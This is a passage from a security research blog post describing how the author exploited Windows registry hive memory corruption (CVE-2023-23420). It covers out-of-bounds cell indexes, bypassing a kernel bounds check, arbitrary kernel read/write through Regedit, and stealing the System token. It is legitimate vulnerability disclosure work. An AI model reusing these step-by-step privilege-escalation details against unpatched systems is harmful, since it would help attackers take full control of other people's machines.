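    HvpGetCellPaged: storage type, directory, table, and byte offset."""
    return {
        "storage":   (index >> 31) & 0x1,    # 0 = stable, 1 = volatile
        "directory": (index >> 21) & 0x3FF,  # index into the 1024-entry directory
        "table":     (index >> 12) & 0x1FF,  # index into the 512-entry table
        "offset":    index & 0xFFF,          # byte offset within the 4 KiB block
    }

# A volatile-storage index with a zero directory/table and offset 0x20:
assert decompose_cell_index(0x80000020) == {
    "storage": 1, "directory": 0, "table": 0, "offset": 0x20,
}
```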
The structures corresponding to the individual levels of the cell map are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY, and they are accessible through the _CMHIVE.Hive.Storage field. From an exploitation perspective, two facts are crucial here. First, the HvpGetCellPaged function does not perform any bounds checks on the input index. Second, for hives smaller than 2 MiB, Windows applies an additional optimization called "small dir". In that case, instead of allocating the entire Directory array of 1024 elements and only using one of them, the kernel sets the _CMHIVE.Hive.Storage[...].Map pointer to the address of the _CMHIVE.Hive.Storage[...].SmallDir field, which simulates a single-element array. In this way, the number of logical cell map levels remains the same, but the system uses one less pool allocation to store them, saving about 8 KiB of memory per hive. This behavior is shown in the screenshot below:
What we have here is a hive that has a stable storage area of 0xEE000 bytes (952 KiB) and a volatile storage area of 0x5000 bytes (20 KiB). Both of these sizes are smaller than 2 MiB, and consequently, the "small dir" optimization is applied in both cases. As a result, the Map pointers (marked in orange) point directly to the SmallDir fields (marked in green).
This situation is interesting because if the kernel attempts to resolve an invalid cell index with a value of 0x200000 or greater (i.e., with the "Directory index" part being non-zero) in the context of such a hive, then the first step of the cell map walk will reference the out-of-bounds Guard, FreeDisplay, etc. fields as pointers. This situation is illustrated in the diagram below:
In other words, by fully controlling the 32-bit value of the cell index, we can make the translation logic jump through two pointers fetched from out-of-bounds memory, and then add a controlled 12-bit offset to the result. An additional consideration is that in the first step, we reference OOB indexes of an "array" located inside the larger _CMHIVE structure, which always has the same layout on a given Windows build. Therefore, by choosing a directory index that references a specific pointer in _CMHIVE, we can be sure that it will always work the same way on a given version of the system, regardless of any random factors.
On the other hand, a small inconvenience is that the _HMAP_ENTRY structure (i.e., the last level of the cell map) has the following layout:
0: kd> dt _HMAP_ENTRY
nt!_HMAP_ENTRY
   +0x000 BlockOffset          : Uint8B
   +0x008 PermanentBinAddress  : Uint8B
   +0x010 MemAlloc             : Uint4B
And the final returned value is the sum of the BlockOffset and PermanentBinAddress fields. Therefore, if one of these fields contains the address we want to reference, the other must be NULL, which may slightly narrow down our options.
If we were to create a graphical representation of the relationships between structures based on the pointers they contain, starting from _CMHIVE, it would look something like the following:
The diagram is not necessarily complete, but it shows an overview of some objects that can be reached from _CMHIVE with a maximum of two pointer dereferences. However, it is important to remember that not every edge in this graph will be traversable in practice. This is for two reasons: first, due to the layout of the _HMAP_ENTRY structure (i.e., 0x18-byte alignment and the need for a 0x0 value adjacent to the given pointer), and second, due to the fact that not every pointer in these objects is always initialized. For example, the _CMHIVE.RootKcb field is only valid for app hives (but not for normal hives), while _CMHIVE.CmRm is only set for standard hives, as app hives never have KTM transaction support enabled. So, the idea provides a good foundation for our exploit, but it does require additional experimentation to get every technical detail right.
Moving on, the !reg cellindex command in WinDbg is perfect for testing out-of-bounds cell indexes, because it uses the exact same cell map walk logic as HvpGetCellPaged, and it doesn't perform any additional bounds checks either. So, let's stick with the HKCU hive we were working with earlier, and try to create a cell index that points back to its _CMHIVE structure. We'll use the _CMHIVE → _CM_RM → _CMHIVE path for this. The first decision we need to make is to choose the storage type for this index: stable (0) or volatile (1). In the case of HKCU, both storage types are non-empty and use the "small dir" optimization, so we can choose either one; let's say volatile. Next, we need to calculate the directory index, which will be equal to the difference between the offsets of the _CMHIVE.CmRm and _CMHIVE.Hive.Storage[1].SmallDir fields:
In this case, it is (0xffff82828fc1b038 - 0xffff82828fc1a3a0) ÷ 8 = 0x193. The next step is to calculate the table index, which will be the offset of the _CM_RM.CmHive field from the beginning of the structure, divided by the size of _HMAP_ENTRY (0x18).
So, the calculation is (0xffff82828fdcc930 - 0xffff82828fdcc8e0) ÷ 0x18 = 3 (integer division, with a remainder of 8). Next, we can verify where the CmHive pointer falls within the _HMAP_ENTRY structure.
0: kd> dt _HMAP_ENTRY 0xffff82828fdcc8e0 + 3*0x18
nt!_HMAP_ENTRY
   +0x000 BlockOffset          : 0
   +0x008 PermanentBinAddress  : 0xffff8282`8fc1a000
   +0x010 MemAlloc             : 0
The _CM_RM.CmHive pointer aligns with the PermanentBinAddress field, which is good news. Additionally, the BlockOffset field is zero, which is also desirable. Internally, it corresponds to the ContainerSize field, which is zeroed out if no KTM transactions have been performed on the hive during this session – this will suffice for our example.
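As a quick sanity check, the two divisions can be reproduced in a few lines of Python, using the addresses from the debugger session above. Note that the second division leaves a remainder of 8, which is exactly why the pointer lands in the PermanentBinAddress field rather than BlockOffset:

```python
# Kernel addresses observed in the WinDbg session above.
small_dir    = 0xffff82828fc1a3a0  # &_CMHIVE.Hive.Storage[1].SmallDir
cmrm_ptr     = 0xffff82828fc1b038  # &_CMHIVE.CmRm
cm_rm_base   = 0xffff82828fdcc8e0  # base of the _CM_RM allocation
cmhive_field = 0xffff82828fdcc930  # &_CM_RM.CmHive

directory_index = (cmrm_ptr - small_dir) // 8
table_index, remainder = divmod(cmhive_field - cm_rm_base, 0x18)

print(hex(directory_index), table_index, remainder)  # 0x193 3 8
```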
We have now calculated three of the four cell index elements, and the last one is the offset, which we will set to zero, as we want to access the _CMHIVE structure from the very beginning. It is time to gather all this information in one place; we can build the final cell index using a simple Python function:
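A minimal version of such a helper, assuming the standard cell index layout (1 storage-type bit, 10 directory-index bits, 9 table-index bits, and a 12-bit cell offset), might look like this:

```python
def MakeCellIndex(storage_type, directory, table, offset):
    """Compose a 32-bit cell index out of its four components:
    [31] storage type | [30:21] directory index | [20:12] table index | [11:0] offset."""
    assert storage_type in (0, 1)
    assert 0 <= directory <= 0x3FF
    assert 0 <= table <= 0x1FF
    assert 0 <= offset <= 0xFFF
    return (storage_type << 31) | (directory << 21) | (table << 12) | offset
```

The result is shown in hex in the interactive session below.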
And then pass the values we have established so far:
>>> MakeCellIndex(1, 0x193, 3, 0)
0xb2603000
>>>
So the final out-of-bounds cell index pointing to the _CMHIVE structure of a given hive is 0xB2603000. It is now time to verify in WinDbg whether this magic index actually works as intended.
Indeed, the _CMHIVE address passed as the input of the command was also printed in its output, which means that our technique works (the extra 0x4 in the output address is there to account for the cell size). If we were to insert this index into the _CM_KEY_VALUE.Data field, we would gain the ability to read from and write to the _CMHIVE structure in kernel memory through the registry value. This represents a very powerful capability in the hands of a local attacker.
Writing the exploit
At this stage, we already have a solid plan for how to leverage the initial primitive of hive memory corruption for further privilege escalation. It's time to choose a specific vulnerability and begin writing an actual exploit for it. This process is described in detail below.
Step 0: Choosing the vulnerability
Faced with approximately 17 vulnerabilities related to hive memory corruption, the immediate challenge is selecting one for a demonstration exploit. While any of these bugs could eventually be exploited with time and experimentation, they vary in difficulty. There is also an aesthetic consideration: for demonstration purposes, it would be ideal if the exploit's actions were visible within Regedit, which narrows our options. Nevertheless, with a significant selection still available, we should be able to identify a suitable candidate. Let's briefly examine two distinct possibilities.
CVE-2022-34707
The first vulnerability that always comes to my mind in the context of the registry is CVE-2022-34707. This is partly because it was the first bug I manually discovered as part of this research, but mainly because it is incredibly convenient to exploit. The essence of this bug is that it was possible to load a hive with a security descriptor containing a refcount very close to the maximum 32-bit value (e.g., 0xFFFFFFFF), and then overflow it by creating a few more keys that used it. This resulted in a very powerful UAF primitive, as the incorrectly freed cell could be subsequently filled with new objects and then freed again any number of times. In this way, it was possible to achieve type confusion of several different types of objects, e.g., by reusing the same cell subsequently as a security descriptor → value node → value data backing cell, we could easily gain control over the _CM_KEY_VALUE structure, allowing us to continue the attack using out-of-bounds cell indexes.
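The underlying arithmetic is plain 32-bit wraparound; a toy illustration of the integer behavior (not the kernel code itself):

```python
MASK32 = 0xFFFFFFFF

refcount = 0xFFFFFFFF               # value planted in the crafted hive file
refcount = (refcount + 1) & MASK32  # one more key starts using the descriptor
print(refcount)                     # 0
```

Once the counter wraps to zero, the security descriptor cell can be freed while live keys still reference it, which is the use-after-free described above.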
Due to its characteristics, this bug was also the first vulnerability in this research for which I wrote a full-fledged exploit. Many of the techniques I describe here were discovered while working on this bug. Furthermore, the screenshot showing the privilege escalation at the end of blog post #1 illustrates the successful exploitation of CVE-2022-34707. However, in the context of this blog post, it has one fundamental flaw: to set the initial refcount to a value close to overflowing the 32-bit range, it is necessary to manually craft the input regf file. This means that the target can only be an app hive, and thus we wouldn't be able to directly observe the exploitation in the Registry Editor. This would greatly reduce my ability to visually demonstrate the exploit, which is what ultimately led me to look for a better bug.
CVE-2023-23420
This brings us to the second vulnerability, CVE-2023-23420. This is also a UAF condition within the hive, but it concerns a key node cell instead of a security descriptor cell. It was caused by certain issues in the transactional key rename operation. These problems were so deep and affected such fundamental aspects of the registry that this and the related vulnerabilities CVE-2023-23421, CVE-2023-23422 and CVE-2023-23423 were fixed by completely removing support for transacted key rename operations.
In terms of exploitation, this bug is particularly unique because it can be triggered using only API/system calls, making it possible to corrupt any hive the attacker has write access to. This makes it an ideal candidate for writing an exploit whose operation is visible to the naked eye using standard Windows registry utilities, so that's what we'll do. Although the details of massaging the hive layout into the desired state may be slightly more difficult here than with CVE-2022-34707, it's nothing we can't handle. So let's get to work!
Step 1: Abusing the UAF to establish dynamically-controlled value cells
Let's start by clarifying that our attack will target the HKCU hive, and more specifically its volatile storage space. This will hopefully make the exploit a bit more reliable, as the volatile space resets each time the hive is reloaded, and there generally isn't much activity occurring there. The exploitation process begins with a key node use-after-free, and our goal is to take full control over the _CM_KEY_VALUE representation of two registry values by the end of the first stage (why two – we'll get to that in a moment). Once we achieve this goal, we will be able to arbitrarily set the _CM_KEY_VALUE.Data field, and thus gain read/write access to any chosen out-of-bounds cell index. There are many different approaches to how to achieve this, but in my proof-of-concept, I started with the following data layout:
At the top of the hierarchy is the HKCU\Exploit key, which is the root of the entire exploit subtree. Its only role is to work as a container for all the other keys and values we create. Below it, we have the "TmpKeyName" key, which is important for two reasons: first, it stores four values that will be used at a later stage to fill freed cells with controlled data (but are currently empty). Second, this is the key on which we will perform the "rename" operation, which is the basis of the CVE-2023-23420 vulnerability. Below it are two more keys, "SubKey1" and "SubKey2", which are also needed in the exploitation process for transactional deletion, each through a different view of their parent.
Once we have this data layout arranged in the hive, we can proceed to trigger the memory corruption. We can do it exactly as described in the original report in section "Operating on subkeys of transactionally renamed keys", and demonstrated in the corresponding InconsistentSubkeyList.cpp source code. In short, it involves the following steps:
Creating a lightweight transaction by calling the NtCreateRegistryTransaction syscall.
Opening two different handles to the HKCU\Exploit\TmpKeyName key within our newly created transaction.
Performing a transactional rename operation on one of these handles, changing the name to "Scratchpad".
Transactionally deleting the "SubKey1" and "SubKey2" keys, each through a different parent handle (one renamed, the other not).
Committing the entire transaction by calling the NtCommitRegistryTransaction syscall.
After successfully executing these operations on a vulnerable system, the layout of our objects within the hive should change accordingly:
We see that the "TmpKeyName" key has been renamed to "Scratchpad", and both its subkeys have been released, but the freed cell of the second subkey still appears on its parent's subkey list. At this point, we want to use the four values of the "Scratchpad" key to create our own fake data structure. According to it, the freed subkey will still appear as existing, and contain two values named "KernelAddr" and "KernelData". Each of the "Container" values is responsible for imitating one type of object, and the most crucial role is played by the "FakeKeyContainer" value. Its backing buffer must perfectly align with the memory previously associated with the "SubKey1" key node. The diagram below illustrates the desired outcome:
All the highlighted cells contain attacker-controlled data, which represent valid regf structures describing the HKCU\Exploit\Scratchpad\FakeKey key and its two values. Once this data layout is achieved, it becomes possible to open a handle to the "FakeKey" using standard APIs such as RegOpenKeyEx, and then operate on arbitrary cell indexes through its values. In reality, the process of crafting these objects after triggering the UAF is slightly more complicated than just setting data for four different values and requires the following steps:
Writing to the "FakeKeyContainer" value with an initial, basic representation of the "FakeKey" key. At this stage, it is not important that the key node is entirely correct, but it must be of the appropriate length, and thus precisely cover the freed cell currently pointed to by the subkey list of the "Scratchpad" key.
Setting the data for the other three container values – again, not the final ones yet, but those that have the appropriate length and are filled with unique markers, so that they can be easily recognized later on.
Launching an info-leak loop to find the three cell indexes corresponding to the data cells of the "ValueListContainer", "KernelAddrContainer" and "KernelDataContainer" values, as well as a cell index of a valid security descriptor. This logic relies on abusing the _CM_KEY_NODE.Class and _CM_KEY_NODE.ClassLength fields of the "FakeKey" to point them to the data in the hive that we want to read. Specifically, the ClassLength member is set to 0xFFC, and the Class member is set to indexes 0x80000000, 0x80001000, 0x80002000, ... in subsequent loop iterations. This enables a kind of "arbitrary hive read" primitive, and the reading can be achieved by calling the NtEnumerateKey syscall on the "Scratchpad" key with the KeyNodeInformation class, which returns, among other things, the class property for a given subkey. This way, we get all the information about the internal hive layout needed to construct the final form of each of the imitated cells.
Using the above information to set the correct data for each of the four cells: the key node of the "FakeKey" key with a valid security descriptor and index to the value list, the value list itself, and the value nodes of "KernelAddr" and "KernelData". This makes "FakeKey" a full-fledged key as seen by Windows, but with all of its internal regf structures fully controlled by us.
If all of these steps are successful, we should be able to open the HKCU\Exploit\Scratchpad key in Regedit and see the current exploitation progress. An example from my test system is shown in the screenshot below. The extra "Filler" value is used to fill the space occupied by the old "TmpKeyName" key node freed during the rename operation. This is necessary so that the data of the "FakeKeyContainer" value correctly aligns with the freed cell of the "SubKey1" key, but I skipped this minor implementation detail in the above high-level description of the logic for the sake of clarity.
Step 2: Getting read/write access to the CMHIVE kernel object
Since we now have full control over some registry values, the next logical step would be to initialize them with a specially crafted OOB cell index and then check if we can actually access the kernel structure it represents. Let's say that we set the type of the "KernelData" value to REG_BINARY, its length to 0x100, and the data cell index to the previously calculated value of 0xB2603000, which should point back at the hive's _CMHIVE structure on the kernel pool. If we do this, and then browse to the "FakeKey" key in the Registry Editor, we will encounter an unpleasant surprise:
This is definitely not the result we expected, and something must have gone wrong. If we investigate the system crash in WinDbg, we will get the following information:
We are seeing bugcheck code 0x51 (REGISTRY_ERROR), which indicates that it was triggered intentionally rather than through a bad memory access. Additionally, the direct caller of KeBugCheckEx is HvpReleaseCellPaged, a function that we haven't really mentioned so far in this blog post series.
To better understand what is actually happening here, we need to take a step back and look at the general scheme of cell operations as implemented in the Windows kernel. It typically follows a common pattern:
There are three stages here: translating the cell index to a virtual address, performing operations on that cell, and releasing it. We are already familiar with the first two, and they are both obvious, but what is the release about? Based on a historical analysis of various Windows kernel builds, it turns out that in some versions, a get+release function pair was used not only for translating cell indexes to virtual addresses, but also to ensure that the memory view of the cell would not be accidentally unmapped between these two calls.
The presence or absence of the "release" function in consecutive Windows versions is shown below:
Windows NT 3.1 – 2000: ❌
Windows XP – 7: ✅
Windows 8 – 8.1: ❌
Windows 10 – 11: ✅
Let's take a look at the decompiled HvpReleaseCellPaged function from Windows 10, 1507 (build 10240), where it first reappeared after a hiatus in Windows 8.x:
As we can see, the main task of HvpReleaseCellPaged and its helper functions was to find the _HMAP_ENTRY structure that corresponded to a given cell index, and then potentially call the ExReleaseRundownProtection API on the _HMAP_ENTRY.TemporaryBinRunDown field. This behavior was coordinated with the implementation of HvpGetCellPaged, which called ExAcquireRundownProtection on the same object. An additional side effect was that during the lookup of the _HMAP_ENTRY structure, a bounds check was performed on the cell index, and if it failed, a REGISTRY_ERROR bugcheck was triggered.
This state of affairs persisted for about two years, until Windows 10 1803 (build 17134). In that version, the code was greatly simplified: the TemporaryBinAddress and TemporaryBinRundown members were removed from _HMAP_ENTRY, and the call to ExReleaseRundownProtection was eliminated from HvpReleaseCellPaged. This effectively meant that there was no longer any reason for this function to retrieve a pointer to the map entry (as it was not used for anything), but for some unclear reason, this logic has remained in the code to this day. In most modern kernel builds, the auxiliary functions have been inlined, and HvpReleaseCellPaged now takes the following form:
The bounds check on the cell index is clearly still present, but it doesn't serve any real purpose. Based on this, we can assume that this is more likely a historical relic than a mitigation deliberately added by the developers. Still, it interferes with our carefully crafted exploitation technique. Does this mean that OOB cell indexes are not viable because their use will always result in a forced BSoD, and we have to look for other privilege escalation methods instead?
As it turns out, not necessarily. Indeed, if the bounds check were located in the HvpGetCellPaged function, there wouldn't be much to discuss – a blue screen would always occur right before using any OOB index, completely neutralizing this idea's usefulness. However, as things stand, resolving such an index works without issues, and we can perform a single invalid memory operation before a crash occurs in the release call. In many ways, this sounds like a "pwn" task straight out of a CTF, where the attacker is given a memory corruption primitive that is theoretically exploitable, but somehow artificially limited, and the goal is to figure out how to cleverly bypass this limitation. Let's take another look at the if statement that stands in our way:
The index is compared against the value of the long-lived _HHIVE.Storage[StorageType].Length field, which is located at a constant offset from the beginning of the _HHIVE structure.On the Windows 11 system I tested, this offset is 0x118 for stable storage and 0x390 for volatile storage:
0: kd> dx (&((_HHIVE*)0)->Storage[0].Length)
(&((_HHIVE*)0)->Storage[0].Length) : 0x118
0: kd> dx (&((_HHIVE*)0)->Storage[1].Length)
(&((_HHIVE*)0)->Storage[1].Length) : 0x390
As we established earlier, the special out-of-bounds index 0xB2603000 points to the base address of the _CMHIVE / _HHIVE structure. By adding one of the offsets above (minus the 4-byte cell header), we can obtain an index that points directly to the Length field. Let's test this in practice:
So, indeed, index 0xB260338C points to the field representing the length of the volatile space in the HKCU hive. This is very good news for an attacker, because it means that they are able to neutralize the bounds check in HvpReleaseCellPaged by performing the following steps:
Crafting a controlled registry value with a data index of 0xB260338C.
Setting this value programmatically to a very large number, such as 0xFFFFFFFF, and thus overwriting the _HHIVE.Storage[1].Length field with it.
During the NtSetValueKey syscall in step 2, when HvpReleaseCellPaged is called on index 0xB260338C, the Length member has already been corrupted.As a result, the condition checked by the function is not satisfied, and the KeBugCheckEx call never occurs.
Since the _HHIVE.Storage[1].Length field is located in a global hive object and does not change very often (unless the storage space is expanded or shrunk), all future checks performed in HvpReleaseCellPaged against this hive will no longer pose any risk to the exploit stability.
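The arithmetic behind the magic index used in step 1 can be double-checked in Python, using the offset from the Windows 11 build shown earlier. The 4-byte cell header must be subtracted, because the translation logic unconditionally adds +4 to every resolved address:

```python
CMHIVE_INDEX = 0xB2603000  # OOB cell index resolving to the _CMHIVE base
VOLATILE_LENGTH = 0x390    # offset of _HHIVE.Storage[1].Length on the tested build
CELL_HEADER = 4            # cell size field skipped by the translation logic

print(hex(CMHIVE_INDEX + VOLATILE_LENGTH - CELL_HEADER))  # 0xb260338c
```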
To better realize just how close the overwriting of the Length field is to its use in the bounds check, we can have a look at the disassembly of the CmpSetValueKeyExisting function, where this whole logic takes place.
The technique works by a hair's breadth – the memmove and HvpReleaseCellPaged calls are separated by only a few instructions. Nevertheless, it works, and if we first perform a write to the 0xB260338C index (or equivalent) after gaining binary control over the hive, then we will be subsequently able to read from/write to any OOB indexes without any restrictions in the future.
For completeness, I should mention that after corrupting the Length field, it is worthwhile to set a few additional flags in the _HHIVE.HiveFlags field using the same trick as before. This prevents the kernel from crashing due to the unexpectedly large hive length. Specifically, the flags are (as named in blog post #6):
HIVE_COMPLETE_UNLOAD_STARTED (0x40): This prevents a crash during potential hive unloading in the CmpLateUnloadHiveWorker → CmpCompleteUnloadKey → HvHiveCleanup → HvpFreeMap → CmpFree function.
HIVE_FILE_READ_ONLY (0x8000): This prevents a crash that could occur in the CmpFlushHive → HvStoreModifiedData → HvpTruncateBins path.
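Numerically, applying both flags amounts to OR-ing their combined mask into the field (the starting value below is a hypothetical example):

```python
HIVE_COMPLETE_UNLOAD_STARTED = 0x40
HIVE_FILE_READ_ONLY = 0x8000

hive_flags = 0x0  # example starting value of _HHIVE.HiveFlags (hypothetical)
hive_flags |= HIVE_COMPLETE_UNLOAD_STARTED | HIVE_FILE_READ_ONLY
print(hex(hive_flags))  # 0x8040
```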
Of course, these are just conclusions drawn from writing a demonstration exploit, so I don't guarantee that the above flags are sufficient to maintain system stability in every configuration. Nevertheless, repeated tests have shown that it works in my environment, and if we subsequently set the data cell index of the controlled value back to 0xB2603000, and the Type/DataLength fields to something like REG_BINARY and 0x100, we should be finally able to see the following result in the Registry Editor:
It is easy to verify that this is indeed a "live view" into the _CMHIVE structure in kernel memory:
Unfortunately, the hive signature 0xBEE0BEE0 is not visible in the screenshot, because the first four bytes of the cell are treated as its size, and only the subsequent bytes as actual data. For this reason, the entire view of the structure is shifted by 4 bytes. Nevertheless, it is immediately apparent that we have gained direct access to function addresses within the kernel image, as well as many other interesting pointers and data. We are getting very close to our goal!
Step 3: Getting arbitrary read/write access to the entire kernel address space
At this point, we can both read from and write to the _CMHIVE structure through our magic value, and also operate on any other out-of-bounds cell index that resolves to a valid address. This means that we no longer need to worry about kernel ASLR, as _CMHIVE readily leaks the base address of ntoskrnl.exe, as well as many other addresses from kernel pools. The question now is how, with these capabilities, to execute our own payload in kernel-mode or otherwise elevate our process's privileges in the system. What may immediately come to mind based on the layout of the _CMHIVE / _HHIVE structure is the idea of overwriting one of the function pointers located at the beginning. In practice, this is less useful than it seems. As I wrote in blog post #6, the vast majority of operations on these pointers have been devirtualized, and in the few cases where they are still used directly, the Control Flow Guard mitigation is enabled. Perhaps something could be ultimately worked out to bypass CFG, but with the primitives currently available to us, I decided that this sounds more difficult than it should be.
If not that, then what else? Experienced exploit developers would surely find dozens of different ways to complete the privilege escalation process. However, I had a specific goal in mind that I wanted to achieve from the start. I thought it would be elegant to create an arrangement of objects where the final stage of exploitation could be performed interactively from within Regedit. This brings us back to the selection of our two fake values, "KernelAddr" and "KernelData". My goal with these values was to be able to enter any kernel address into KernelAddr, and have KernelData automatically – based solely on how the registry works – contain the data from that address, available for both reading and writing. This would enable a very unique situation where the user could view and modify kernel memory within the graphical interface of a tool available in a default Windows installation – something that doesn't happen very often. 🙂
The crucial observation that allows us to even consider such a setup is the versatility of the cell maps mechanism. In order for such an obscure arrangement to work, KernelData must utilize a _HMAP_ENTRY structure controlled by KernelAddr at the final stage of the cell walk. Referring back to the previous diagram illustrating the relationships between the _CMHIVE structure and other objects, this implies that if KernelAddr reaches an object through two pointer dereferences, KernelData must be configured to reach it with a single dereference, so that the second dereference then occurs through the data stored in KernelAddr.
In practice, this can be achieved as follows: KernelAddr will function similarly as before, pointing to an offset within _CMHIVE using a series of pointer dereferences:
_CMHIVE.CmRm → _CM_RM.Hive → _CMHIVE: for normal hives (e.g., HKCU).
_CMHIVE.RootKcb → _CM_KEY_CONTROL_BLOCK.KeyHive → _CMHIVE: for app hives.
For KernelData, we can use any self-referencing pointer in the first step of the cell walk. These are plentiful in _CMHIVE, due to the fact that there are many LIST_ENTRY objects initialized as an empty list.
The next step is to select the appropriate offsets and indexes based on the layout of the _CMHIVE structure, so that everything aligns with our plan. Starting with KernelAddr, the highest 20 bits of the cell index remain the same as before, which is 0xB2603???. The lower 12 bits will correspond to an offset within _CMHIVE where we will place our fake _HMAP_ENTRY object. This should be a 0x18-byte area that is generally unused and located after a self-referencing pointer. For demonstration purposes, I used offset 0xB70, which corresponds to the following fields:
_CMHIVE layout                                | _HMAP_ENTRY layout
+0xb70 UnloadEventArray : Ptr64 Ptr64 _KEVENT | +0x000 BlockOffset : Uint8B
+0xb78 RootKcb : Ptr64 _CM_KEY_CONTROL_BLOCK  | +0x008 PermanentBinAddress : Uint8B
+0xb80 Frozen : UChar                         | +0x010 MemAlloc : Uint4B
On my test Windows 11 system, all these fields are zeroed out and unused for the HKCU hive, which makes them well-suited for acting as the _HMAP_ENTRY structure. The final cell index for the KernelAddr value will, therefore, be 0xB2603000 + 0xB70 - 0x4 = 0xB2603B6C. If we set its type to REG_QWORD and its length to 8 bytes, then each write to it will result in setting the _CMHIVE.UnloadEventArray field (or _HMAP_ENTRY.BlockOffset in the context of the cell walk) to the specified 64-bit number.
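As a cross-check of this construction, the final index can be decomposed back into its four components in Python (bit positions assume the 1/10/9/12 cell index layout used throughout this series; note how the 12-bit offset 0xb6c is the fake _HMAP_ENTRY offset 0xB70 minus the 4-byte cell header):

```python
index = 0xB2603000 + 0xB70 - 0x4  # _CMHIVE base index + fake entry offset - header
assert index == 0xB2603B6C

# Decompose back into the four cell index components:
storage   = index >> 31           # storage type bit
directory = (index >> 21) & 0x3FF # 10-bit directory index
table     = (index >> 12) & 0x1FF # 9-bit table index
offset    = index & 0xFFF         # 12-bit cell offset

print(storage, hex(directory), table, hex(offset))  # 1 0x193 3 0xb6c
```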
As for KernelData, we will use _CMHIVE.SecurityHash[3].Flink, located at offset 0x798, as the aforementioned self-referencing pointer. To calculate the directory index value, we need to subtract it from the offset of _CMHIVE.Hive.Storage[1].SmallDir and then divide by 8, which gives us: (0x798 - 0x3A0) ÷ 8 = 0x7F. Next, we will calculate the table index by subtracting the offset of the fake _HMAP_ENTRY structure from the offset of the self-referencing pointer and then dividing the result by the size of _HMAP_ENTRY: (0xB70 - 0x798) ÷ 0x18 = 0x29. If we assume that the 12-bit offset part is zero (we don't want to add any offsets at this point), then we have all the elements needed to compose the full cell index. We will use the MakeCellIndex helper function defined earlier for this purpose:
>>> MakeCellIndex(1, 0x7F, 0x29, 0)
0x8fe29000
So, the cell index for the KernelData value will be 0x8FE29000, and with that, we have all the puzzle pieces needed to assemble our intricate construction. This is illustrated in the diagram below:
The cell map walk for the KernelAddr value is shown on the right side of the _CMHIVE structure, and the cell map walk for KernelData is on the left.The dashed arrows marked with numbers ①, ②, and ③ correspond to the consecutive elements of the cell index (i.e., directory index, table index, and offset), while the solid arrows represent dereferences of individual pointers.As you can see, we successfully managed to select indexes where the data of one value directly influences the target virtual address to which the other one is resolved.
We could end this section right here, but there is one more minor issue I'd like to mention. As you may recall, the HvpGetCellPaged function ends with the following statement:
Our current assumption is that the PermanentBinAddress and the lower 12 bits of the index are both zero, and BlockOffset contains the exact value of the address we want to access. Unfortunately, the expression ends with the extra "+4". Normally, this skips the cell size and directly returns a pointer to the cell's data, but in our exploit, it means we would see a view of the kernel memory shifted by four bytes. This isn't a huge issue in practical terms, but it doesn't look perfect in a demonstration.
So, can we do anything about this? It turns out, we can. What we want to achieve is to subtract 4 from the final result using the other controlled addends in the expression (PermanentBinAddress and BlockOffset). Individually, each of them has some limitations:
The PermanentBinAddress is a fully controlled 64-bit field, but only its upper 60 bits are used when constructing the cell address. This means we can only use it to subtract multiples of 0x10, but not exactly 4.
The cell offset is a 12-bit unsigned number, so we can use it to add any number in the 1–4095 range, but we can't subtract anything.
However, we can combine both of them together to achieve the desired goal. If we set PermanentBinAddress to 0xFFFFFFFFFFFFFFF0 (-0x10 in 64-bit representation) and the cell offset to 0xC, their sum will be -4, which will mutually reduce with the unconditionally added +4, causing the HvpGetCellPaged function to return exactly Entry->BlockOffset. For our exploit, this means one additional write to the _CMHIVE structure to properly initialize the fake PermanentBinAddress field, and a slight change in the cell index of the KernelData value from the previous 0x8FE29000 to 0x8FE2900C. If we perform all these steps correctly, we should be able to read and write arbitrary kernel memory via Regedit. For example, let's dump the data at the beginning of the ntoskrnl.exe kernel image using WinDbg:
And then let's browse to the same address using our FakeKey in Regedit:
The data from both sources match, and the KernelData value displays them correctly without any additional offset. A keen observer will note that the expected "MZ" signature is not there, because I entered an address 4 bytes greater than the kernel image base. I did this because, even though we can "peek" at any virtual address X through the special registry value, the kernel still internally accesses address X-4 for certain implementation reasons. Since there isn't any data mapped directly before the ntoskrnl.exe image in memory, using the exact image base would result in a system crash while trying to read from the invalid address 0xFFFFF803507FFFFC.
An even more attentive reader will also notice that the exploit has jokingly changed the window title from "Registry Editor" to "Kernel Memory Editor", as that's what the program has effectively become at this point. 🙂
Step 4: Elevating process security token
With an arbitrary kernel read/write primitive and the address of ntoskrnl.exe at our disposal, escalating privileges is a formality. The simplest approach is perhaps to iterate through the linked list of all processes (made of _EPROCESS structures) starting from nt!KiProcessListHead, find both the "System" process and our own process on the list, and then copy the security token from the former to the latter. This method is illustrated in the diagram below.
This entire procedure could be easily performed programmatically, using only RegQueryValueEx and RegSetValueEx calls. However, it would be a shame not to take advantage of the fact that we can modify kernel memory through built-in Windows tools. Therefore, my exploit performs most of the necessary steps automatically, except for the final stage – overwriting the process security token. For that part, it creates a .reg file on disk that refers to our fake key and its two registry values. The first is KernelAddr, which points to the address of the security token within the _EPROCESS structure of a newly created command prompt, followed by KernelData, which contains the actual value of the System token. The invocation and output of the exploit look as follows:
Then, a new command prompt window appears on the screen. There, we can manually perform the final step of the attack, applying changes from the newly created become_admin.reg file using the reg.exe tool, thus overwriting the appropriate field in kernel memory and granting ourselves elevated privileges:
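For illustration, a become_admin.reg file of the kind described above might look roughly like the fragment below. The key path and hex payloads are hypothetical placeholders; the real values (the kernel address of the token field and the System token value) are generated by the exploit at runtime, and the actual fake key path depends on the exploit's setup.

```
Windows Registry Editor Version 5.00

; Hypothetical layout -- the key path and both hex payloads are
; placeholders for values computed by the exploit at runtime.
[HKEY_LOCAL_MACHINE\SYSTEM\FakeKey]
"KernelAddr"=hex:f0,de,bc,9a,78,56,34,12
"KernelData"=hex:ef,cd,ab,89,67,45,23,01
```

Applying such a file with reg.exe (or Regedit) first "seeks" the kernel write primitive to the address in KernelAddr, then writes the bytes from KernelData there.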
As we can see, the attack was indeed successful, and our cmd.exe process is now running as NT AUTHORITY\SYSTEM. A similar effect could be achieved from the graphical interface by double-clicking the .reg file and applying it using the Regedit program associated with this extension. This is exactly how I finalized my attack during the exploit demonstration at OffensiveCon 2024, which can be viewed in the recording of the presentation:
Final thoughts
Since we have now fully achieved our intended goal, we can return to our earlier, incomplete diagram, and fill it in with all the intermediate steps we have taken:
To conclude this blog post, I would like to share some final thoughts regarding hive-based memory corruption vulnerabilities.
Exploit mitigations
